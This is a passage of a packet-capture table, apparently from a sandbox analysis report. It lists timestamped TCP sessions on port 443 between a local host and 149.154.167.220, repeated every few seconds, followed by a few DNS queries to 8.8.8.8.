Apr 8, 2022 12:14:03.985997915 CEST	443	49182	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:04.043549061 CEST	443	49182	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:04.048913002 CEST	49182	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:04.048944950 CEST	443	49182	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:04.105253935 CEST	443	49182	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:04.106955051 CEST	49182	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:04.106998920 CEST	443	49182	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:04.107059956 CEST	49182	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:04.107069969 CEST	443	49182	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:04.107131958 CEST	49182	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:04.107142925 CEST	443	49182	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:04.107214928 CEST	49182	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:04.107227087 CEST	443	49182	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:04.107307911 CEST	49182	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:04.107342005 CEST	443	49182	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:04.107397079 CEST	49182	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:04.107404947 CEST	443	49182	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:04.108369112 CEST	49182	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:04.108397007 CEST	443	49182	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:04.108484030 CEST	49182	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:04.108498096 CEST	443	49182	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:04.427867889 CEST	443	49182	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:04.427989960 CEST	443	49182	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:04.428086042 CEST	49182	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:04.428741932 CEST	49182	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:09.391829967 CEST	49183	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:09.391876936 CEST	443	49183	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:09.391974926 CEST	49183	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:09.398963928 CEST	49183	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:09.398997068 CEST	443	49183	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:09.457102060 CEST	443	49183	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:09.461510897 CEST	49183	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:09.461543083 CEST	443	49183	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:09.510643959 CEST	443	49183	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:09.518188000 CEST	49183	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:09.518225908 CEST	443	49183	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:09.519305944 CEST	49183	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:09.519329071 CEST	443	49183	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:09.519392014 CEST	49183	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:09.519407988 CEST	443	49183	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:09.519474030 CEST	49183	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:09.519488096 CEST	443	49183	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:09.519555092 CEST	49183	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:09.519830942 CEST	443	49183	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:09.519990921 CEST	49183	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:09.520131111 CEST	443	49183	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:09.520225048 CEST	49183	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:09.520246983 CEST	443	49183	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:09.892404079 CEST	443	49183	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:09.892522097 CEST	443	49183	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:09.893632889 CEST	49183	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:09.893922091 CEST	49183	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:14.623917103 CEST	49184	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:14.623960018 CEST	443	49184	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:14.624038935 CEST	49184	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:14.624874115 CEST	49184	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:14.624890089 CEST	443	49184	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:14.681444883 CEST	443	49184	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:14.686954975 CEST	49184	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:14.686988115 CEST	443	49184	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:14.734714985 CEST	443	49184	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:14.744982958 CEST	49184	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:14.745023012 CEST	443	49184	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:14.745089054 CEST	49184	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:14.745099068 CEST	443	49184	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:14.745145082 CEST	49184	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:14.745156050 CEST	443	49184	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:14.745214939 CEST	49184	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:14.745227098 CEST	443	49184	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:14.745290995 CEST	49184	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:14.746262074 CEST	443	49184	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:14.746644974 CEST	443	49184	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:14.746773958 CEST	49184	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:14.750262022 CEST	443	49184	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:14.753460884 CEST	49184	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:14.753489971 CEST	443	49184	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:15.076205969 CEST	443	49184	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:15.076354027 CEST	443	49184	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:15.076518059 CEST	49184	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:15.077306986 CEST	49184	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:19.878390074 CEST	49185	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:19.878439903 CEST	443	49185	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:19.878504992 CEST	49185	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:19.882858038 CEST	49185	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:19.882886887 CEST	443	49185	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:19.966259956 CEST	443	49185	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:20.168833017 CEST	49185	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:20.747241974 CEST	49185	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:20.747277021 CEST	443	49185	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:20.789699078 CEST	443	49185	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:21.023364067 CEST	49185	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:23.316148043 CEST	49185	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:23.316186905 CEST	443	49185	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:23.316277981 CEST	49185	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:23.316289902 CEST	443	49185	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:23.316354990 CEST	49185	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:23.316368103 CEST	443	49185	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:23.316448927 CEST	49185	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:23.316463947 CEST	443	49185	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:23.316560984 CEST	49185	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:23.316579103 CEST	443	49185	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:23.316634893 CEST	49185	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:23.316643000 CEST	443	49185	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:23.319140911 CEST	49185	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:23.319168091 CEST	443	49185	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:23.319262028 CEST	49185	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:23.319274902 CEST	443	49185	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:23.808376074 CEST	443	49185	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:23.808511972 CEST	443	49185	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:23.808721066 CEST	49185	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:23.809284925 CEST	49185	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:26.428874969 CEST	49186	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:26.428931952 CEST	443	49186	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:26.429075956 CEST	49186	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:26.441379070 CEST	49186	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:26.441430092 CEST	443	49186	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:26.499676943 CEST	443	49186	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:26.506577969 CEST	49186	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:26.506611109 CEST	443	49186	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:26.558296919 CEST	443	49186	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:26.559837103 CEST	49186	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:26.559866905 CEST	443	49186	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:26.559942961 CEST	49186	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:26.559954882 CEST	443	49186	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:26.560015917 CEST	49186	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:26.560055971 CEST	443	49186	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:26.560141087 CEST	49186	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:26.560158014 CEST	443	49186	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:26.560239077 CEST	49186	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:26.560301065 CEST	443	49186	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:26.560348988 CEST	49186	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:26.560358047 CEST	443	49186	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:26.560872078 CEST	49186	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:26.560889959 CEST	443	49186	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:26.560976028 CEST	49186	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:26.560990095 CEST	443	49186	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:26.901403904 CEST	443	49186	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:26.901846886 CEST	443	49186	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:26.902342081 CEST	49186	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:26.902370930 CEST	443	49186	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:26.902384996 CEST	49186	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:26.902905941 CEST	49186	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:31.771501064 CEST	49187	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:31.771543980 CEST	443	49187	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:31.771609068 CEST	49187	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:31.772476912 CEST	49187	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:31.772497892 CEST	443	49187	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:31.833436966 CEST	443	49187	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:31.836623907 CEST	49187	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:31.836652994 CEST	443	49187	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:31.886600018 CEST	443	49187	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:31.888312101 CEST	49187	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:31.888339996 CEST	443	49187	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:31.888391018 CEST	49187	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:31.888402939 CEST	443	49187	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:31.888454914 CEST	49187	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:31.888463974 CEST	443	49187	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:31.888518095 CEST	49187	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:31.888529062 CEST	443	49187	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:31.888597965 CEST	49187	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:31.888634920 CEST	443	49187	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:31.888694048 CEST	49187	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:31.888705969 CEST	443	49187	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:31.889369965 CEST	49187	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:31.889390945 CEST	443	49187	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:31.889456034 CEST	49187	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:31.889467001 CEST	443	49187	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:32.276534081 CEST	443	49187	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:32.276686907 CEST	443	49187	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:32.276808023 CEST	49187	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:32.277636051 CEST	49187	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:37.149046898 CEST	49188	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:37.149082899 CEST	443	49188	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:37.149322033 CEST	49188	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:37.150454044 CEST	49188	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:37.150468111 CEST	443	49188	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:37.212197065 CEST	443	49188	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:37.215898991 CEST	49188	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:37.215923071 CEST	443	49188	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:37.266928911 CEST	443	49188	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:37.273658037 CEST	49188	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:37.273689032 CEST	443	49188	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:37.274652958 CEST	49188	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:37.274667025 CEST	443	49188	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:37.274759054 CEST	49188	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:37.274771929 CEST	443	49188	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:37.274935007 CEST	49188	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:37.274945974 CEST	443	49188	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:37.275122881 CEST	49188	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:37.275140047 CEST	443	49188	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:37.275253057 CEST	49188	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:37.275269032 CEST	443	49188	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:37.275444984 CEST	49188	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:37.275461912 CEST	443	49188	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:37.630585909 CEST	443	49188	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:37.630709887 CEST	443	49188	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:37.630816936 CEST	49188	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:37.631881952 CEST	49188	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:42.430150986 CEST	49189	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:42.430201054 CEST	443	49189	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:42.431128979 CEST	49189	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:42.431164026 CEST	49189	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:42.431173086 CEST	443	49189	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:42.488671064 CEST	443	49189	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:42.491900921 CEST	49189	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:42.491918087 CEST	443	49189	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:42.544533968 CEST	443	49189	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:42.546555996 CEST	49189	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:42.546575069 CEST	443	49189	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:42.546772957 CEST	49189	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:42.546781063 CEST	443	49189	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:42.547116041 CEST	49189	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:42.547127962 CEST	443	49189	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:42.547293901 CEST	49189	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:42.547305107 CEST	443	49189	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:42.547518015 CEST	49189	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:42.547533989 CEST	443	49189	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:42.547588110 CEST	49189	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:42.547596931 CEST	443	49189	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:42.547733068 CEST	49189	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:42.547749996 CEST	443	49189	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:42.547871113 CEST	49189	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:42.547884941 CEST	443	49189	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:42.868736029 CEST	443	49189	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:42.868845940 CEST	443	49189	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:42.870934963 CEST	49189	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:42.872060061 CEST	49189	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:47.773679972 CEST	49190	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:47.773726940 CEST	443	49190	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:47.774308920 CEST	49190	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:47.774975061 CEST	49190	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:47.774995089 CEST	443	49190	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:47.833978891 CEST	443	49190	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:47.849054098 CEST	49190	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:47.849095106 CEST	443	49190	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:47.891496897 CEST	443	49190	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:47.893454075 CEST	49190	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:47.893484116 CEST	443	49190	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:47.893568039 CEST	49190	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:47.893577099 CEST	443	49190	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:47.893635988 CEST	49190	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:47.893646002 CEST	443	49190	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:47.893703938 CEST	49190	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:47.893714905 CEST	443	49190	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:47.893783092 CEST	49190	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:47.893848896 CEST	443	49190	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:47.894265890 CEST	443	49190	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:47.894419909 CEST	49190	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:47.894459009 CEST	443	49190	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:47.894562006 CEST	49190	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:47.894588947 CEST	443	49190	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:47.894668102 CEST	49190	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:47.894684076 CEST	443	49190	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:48.263930082 CEST	443	49190	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:48.264055014 CEST	443	49190	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:48.270375967 CEST	49190	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:48.270399094 CEST	443	49190	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:48.270797014 CEST	49190	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:48.270812988 CEST	49190	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:53.057854891 CEST	49191	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:53.057898998 CEST	443	49191	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:53.057964087 CEST	49191	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:53.063477993 CEST	49191	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:53.063513994 CEST	443	49191	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:53.120929956 CEST	443	49191	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:53.321647882 CEST	49191	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:53.453353882 CEST	49191	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:53.453383923 CEST	443	49191	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:53.480730057 CEST	443	49191	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:53.689826012 CEST	49191	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:53.778453112 CEST	49191	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:53.778932095 CEST	443	49191	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:53.779035091 CEST	49191	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:53.779143095 CEST	443	49191	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:53.779239893 CEST	49191	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:53.779305935 CEST	443	49191	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:53.779421091 CEST	49191	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:53.779572964 CEST	443	49191	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:53.779696941 CEST	49191	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:53.779978037 CEST	443	49191	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:53.780122042 CEST	49191	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:53.780338049 CEST	443	49191	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:53.780473948 CEST	49191	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:53.780499935 CEST	443	49191	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:54.130789042 CEST	443	49191	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:54.130970001 CEST	443	49191	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:54.134882927 CEST	49191	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:55.270287991 CEST	49191	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:58.966634989 CEST	49192	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:58.966676950 CEST	443	49192	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:58.966766119 CEST	49192	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:58.967623949 CEST	49192	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:58.967642069 CEST	443	49192	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:59.026262045 CEST	443	49192	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:59.034085989 CEST	49192	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:59.034136057 CEST	443	49192	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:59.079737902 CEST	443	49192	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:59.082839966 CEST	49192	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:59.082885027 CEST	443	49192	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:59.082961082 CEST	49192	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:59.082971096 CEST	443	49192	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:59.083023071 CEST	49192	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:59.083031893 CEST	443	49192	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:59.083106041 CEST	49192	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:59.083129883 CEST	443	49192	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:59.083216906 CEST	49192	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:59.083345890 CEST	443	49192	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:59.083416939 CEST	49192	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:59.083425045 CEST	443	49192	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:59.083821058 CEST	49192	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:59.083839893 CEST	443	49192	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:59.083913088 CEST	49192	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:59.083926916 CEST	443	49192	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:59.440445900 CEST	443	49192	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:59.440557957 CEST	443	49192	149.154.167.220	192.168.2.22
Apr 8, 2022 12:14:59.440622091 CEST	49192	443	192.168.2.22	149.154.167.220
Apr 8, 2022 12:14:59.488003016 CEST	49192	443	192.168.2.22	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 8, 2022 12:12:55.384783983 CEST	55868	53	192.168.2.22	8.8.8.8
Apr 8, 2022 12:12:55.401964903 CEST	53	55868	8.8.8.8	192.168.2.22
Apr 8, 2022 12:12:55.436357021 CEST	49688	53	192.168.2.22	8.8.8.8
Apr 8, 2022 12:12:55.455504894 CEST	53	49688	8.8.8.8	192.168.2.22
Apr 8, 2022 12:13:09.966267109 CEST	58836	53	192.168.2.22	8.8.8.8
Apr 8, 2022 12:13:09.986238003 CEST	53	58836	8.8.8.8	192.168.2.22
Apr 8, 2022 12:13:12.028687954 CEST	50134	53	192.168.2.22	8.8.8.8
Apr 8, 2022 12:13:12.047924042 CEST	53	50134	8.8.8.8	192.168.2.22
Apr 8, 2022 12:13:16.225281000 CEST	55275	53	192.168.2.22	8.8.8.8
Apr 8, 2022 12:13:16.244759083 CEST	53	55275	8.8.8.8	192.168.2.22
Apr 8, 2022 12:13:21.895610094 CEST	59915	53	192.168.2.22	8.8.8.8
Apr 8, 2022 12:13:21.913070917 CEST	53	59915	8.8.8.8	192.168.2.22
Apr 8, 2022 12:13:29.551314116 CEST	54408	53	192.168.2.22	8.8.8.8
Apr 8, 2022 12:13:29.570374012 CEST	53	54408	8.8.8.8	192.168.2.22
Apr 8, 2022 12:13:38.388186932 CEST	50108	53	192.168.2.22	8.8.8.8
